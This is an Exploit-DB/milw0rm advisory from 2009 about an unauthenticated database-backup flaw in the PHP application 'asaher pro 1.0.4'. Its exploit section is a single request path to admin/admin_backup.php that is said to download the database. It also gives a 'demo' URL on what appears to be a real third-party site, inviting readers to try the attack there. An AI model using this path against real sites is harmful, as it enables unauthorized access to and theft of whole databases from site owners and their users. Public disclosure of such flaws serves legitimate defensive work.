asaher pro 1.0.4 - Remote Database Backup

EDB-ID:

9475

CVE:

N/A


Author:

alnjm33

Type:

webapps


Platform:

PHP

Date:

2009-08-18


:::::::::::::::::::::::::::::::::::::::
found by alnjm33
my site : http://sec-war.com/cc/
mail:alnjm33(at)hotmail.com
::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::Re: asaher pro v1.0.4 Remote Database Backup Vulnerability:::::::::::::::::::::::::::
expolit:
 /path/admin/admin_backup.php <<< you will downlaod the database
view demo
http://daralyamama.com/news/admin/admin_backup.php
::::::::::::::::::::::::::::::::::::::::::::::::::::::::

 Special Thanks : all sec-war.com  members

# milw0rm.com [2009-08-18]